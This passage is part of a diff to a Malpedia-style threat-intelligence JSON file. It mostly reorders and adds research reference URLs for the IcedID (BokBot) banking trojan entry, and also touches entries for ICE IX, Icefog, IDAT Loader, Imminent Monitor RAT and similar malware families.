"https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/", - "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", - "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", - "https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1", - "https://nikpx.github.io/malware/analysis/2022/03/09/BokBot", - "https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://forensicitguy.github.io/analyzing-icedid-document/", - "https://matth.dmz42.org/posts/2022/automatically-unpacking-icedid-stage1-with-angr/", - "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", - "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/", - "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/", - "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders", - "https://www.group-ib.com/blog/icedid", - "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot", - "https://thedfirreport.com/2021/05/12/conti-ransomware/", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", - "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/", - "https://www.bleepingcomputer.com/news/security/hackers-target-ukrainian-govt-with-icedid-malware-zimbra-exploits/", - "https://ceriumnetworks.com/threat-of-the-month-icedid-malware/", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://dshield.org/diary/Recent+IcedID+Bokbot+activity/29740/", - "https://cert.gov.ua/article/39609", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ", - "https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id", - "https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", - "https://blog.talosintelligence.com/2020/07/valak-emerges.html", - "https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/", - "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", - "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", - "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html", - "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes", - "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", - "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", - "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/", - "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html", - "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://www.elastic.co/security-labs/icedids-network-infrastructure-is-alive-and-well", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure", - "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", - "https://www.youtube.com/watch?v=oZ4bwnjcXWg", - "https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/", - "https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/", - "https://twitter.com/Unit42_Intel/status/1645851799427874818", - "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917", - "https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/", - "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid", - "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", - "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary", - "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html", - "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", - "https://www.team-cymru.com/post/from-chile-with-malware", - "https://www.trendmicro.com/en_ie/research/22/l/icedid-botnet-distributors-abuse-google-ppc-to-distribute-malware.html", - "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766", - "https://www.youtube.com/watch?v=7Dk7NkIbVqY", - "https://www.youtube.com/watch?v=wMXD4Sv1Alw", - "https://tccontre.blogspot.com/2021/01/", - "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims", - "https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/", - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://www.netresec.com/?page=Blog&month=2022-10&post=IcedID-BackConnect-Protocol", - "https://netresec.com/?b=214d7ff", - "https://www.netresec.com/?page=Blog&month=2023-02&post=How-to-Identify-IcedID-Network-Traffic", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", - "https://threatresearch.ext.hp.com/detecting-ta551-domains/", - "https://www.socinvestigation.com/icedid-banking-trojan-returns-with-new-ttps-detection-response/", - "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html", - "https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros", - "https://isc.sans.edu/diary/28636", - "https://blog.reconinfosec.com/an-encounter-with-ta551-shathak", - "https://www.elastic.co/security-labs/unpacking-icedid", - "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return", - "https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf", - "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", - "https://isc.sans.edu/diary/rss/28934", - "https://www.youtube.com/watch?v=wObF9n2UIAM", - "https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/", "https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884", + "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", + "https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/", + "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships", + "https://thedfirreport.com/2021/05/12/conti-ransomware/", + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", + "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", + "https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240", + "https://eln0ty.github.io/malware%20analysis/IcedID/", + "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/", + "https://ceriumnetworks.com/threat-of-the-month-icedid-malware/", + "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader", + "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/", + "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", + "https://blog.talosintelligence.com/2020/07/valak-emerges.html", + "https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol", + "https://blog.group-ib.com/prometheus-tds", + "https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol-part-2", + "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766", + "https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/", + "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/", + "https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/", + "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", + "https://www.elastic.co/security-labs/icedids-network-infrastructure-is-alive-and-well", + "https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", + "https://www.trendmicro.com/en_ie/research/22/l/icedid-botnet-distributors-abuse-google-ppc-to-distribute-malware.html", + "https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/", + "https://www.binarydefense.com/icedid-gziploader-analysis/", + "https://thedfirreport.com/2022/04/25/quantum-ransomware/", + "https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://www.bleepingcomputer.com/news/security/hackers-target-ukrainian-govt-with-icedid-malware-zimbra-exploits/", + "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes", + "https://forensicitguy.github.io/analyzing-icedid-document/", + "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html", + "https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion", + "https://cert.gov.ua/article/39609", + "https://www.elastic.co/security-labs/unpacking-icedid", + "https://netresec.com/?b=214d7ff", + "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/", + "https://nikpx.github.io/malware/analysis/2022/03/09/BokBot", + "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service", + "https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html", + "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", + "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/", + "https://malwation.com/icedid-malware-technical-analysis-report/", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", + "https://research.loginsoft.com/threat-research/icedid-malware-traversing-through-its-various-incarnations/", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.group-ib.com/blog/icedid", + "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html", + "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", + "https://www.bleepingcomputer.com/news/security/microsoft-exchange-targeted-for-icedid-reply-chain-hijacking-attacks/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", + "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.splunk.com/en_us/blog/security/detecting-icedid-could-it-be-a-trickbot-copycat.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/", + "https://www.youtube.com/watch?v=YEqLIR6hfOM", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.ironnet.com/blog/ransomware-graphic-blog", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", + "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", + "https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back", + "https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ", + "https://www.youtube.com/watch?v=7Dk7NkIbVqY", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/", + "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", + "https://twitter.com/felixw3000/status/1521816045769662468", + "https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2", + "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/", + "https://github.com/telekom-security/icedid_analysis", + "https://www.youtube.com/watch?v=wObF9n2UIAM", + "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid", + "https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/", + "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html", + "https://isc.sans.edu/diary/29740", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", + "https://github.com/f0wl/deICEr", + "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917", + "https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344", + "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot", + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", + "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/", + "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/", + "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", + "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", + "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", + "https://intel471.com/blog/malvertising-surges-to-distribute-malware", + "https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://isc.sans.edu/diary/rss/28934", + "https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/", + "https://isc.sans.edu/diary/28636", + "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html", + "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx", + "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", + "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", + "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/", + "https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/", + "https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://tccontre.blogspot.com/2021/01/", + "https://drive.google.com/file/d/1jB0CsDvAADSrBeGxoi5gzyx8eQIiOJ2G/view", + "https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/", + "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/", + "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/", + "https://www.youtube.com/watch?v=wMXD4Sv1Alw", + "https://matth.dmz42.org/posts/2022/automatically-unpacking-icedid-stage1-with-angr/", + "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/", + "https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/", + "https://www.netresec.com/?page=Blog&month=2023-02&post=How-to-Identify-IcedID-Network-Traffic", + "https://www.youtube.com/watch?v=oZ4bwnjcXWg", + "https://github.com/0xThiebaut/PCAPeek/", + "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure", + "https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns", + "https://unit42.paloaltonetworks.com/atoms/monsterlibra/", "https://blog.minerva-labs.com/icedid-maas", - "https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back" + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid", + "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html", + "https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing", + "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary", + "https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan", + "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html", + "https://twitter.com/embee_research/status/1592067841154756610?s=20", + "https://www.socinvestigation.com/icedid-banking-trojan-returns-with-new-ttps-detection-response/", + "https://www.team-cymru.com/post/from-chile-with-malware", + "https://twitter.com/Unit42_Intel/status/1645851799427874818", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", + "https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/", + "https://www.netresec.com/?page=Blog&month=2022-10&post=IcedID-BackConnect-Protocol", + "https://www.first.org/resources/papers/amsterdam23/IcedID-FIRST-AMS-2023.pdf", + "https://dshield.org/diary/Recent+IcedID+Bokbot+activity/29740/", + "https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1", + "https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/", + "https://unit42.paloaltonetworks.com/wireshark-quiz-icedid-answers/", + "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware", + "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", + "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", + "https://blog.reconinfosec.com/an-encounter-with-ta551-shathak" ], "synonyms": [ "BokBot", @@ -28630,9 +29982,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader", - "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "https://threatray.com/blog/a-new-icedid-gziploader-variant/", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", - "https://threatray.com/blog/a-new-icedid-gziploader-variant/" + "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/" ], "synonyms": [], "type": [] @@ -28645,11 +29997,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf", + "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", "http://www.kz-cert.kz/page/502", - "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko" ], "synonyms": [ @@ -28674,14 +30026,14 @@ "value": "win.icexloader" }, { - "description": "The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus’s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.", + "description": "The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus\u2019s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix", "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus", + "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/", "https://securelist.com/ice-ix-not-cool-at-all/29111/", - "https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/" + "https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/" ], "synonyms": [], "type": [] @@ -28708,10 +30060,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.iconic_stealer", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack", - "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise", "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack", - "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/", - "https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html" + "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise", + "https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html", + "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/" ], "synonyms": [], "type": [] @@ -28723,6 +30075,7 @@ "description": "", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart", "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart" ], "synonyms": [ @@ -28733,6 +30086,19 @@ "uuid": "bcc8b6ea-9295-4a22-a70d-422b1fd9814e", "value": "IcyHeart" }, + { + "description": "According to Rapid7, this is a loader first spotted in July 2023. It implements several evasion techniques including Process Doppelg\u00e4nging, DLL Search Order Hijacking, and Heaven's Gate. IDAT loader got its name as the threat actor stores the malicious payload in the IDAT chunk of PNG file format.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.idat_loader", + "https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1033c988-41db-4f16-9e40-670397b50db8", + "value": "IDAT Loader" + }, { "description": "", "meta": { @@ -28751,9 +30117,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff", - "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf", "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf", "https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/", + "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf", "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" ], "synonyms": [], @@ -28782,8 +30148,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east", - "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east" ], "synonyms": [], "type": [] @@ -28796,16 +30162,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/", - "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", - "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", + "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/", - "https://www.politie.nl/nieuws/2021/mei/19/04-aanhouding-in-onderzoek-naar-cybercrime.html", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", + "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", - "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/" + "https://www.politie.nl/nieuws/2021/mei/19/04-aanhouding-in-onderzoek-naar-cybercrime.html", + 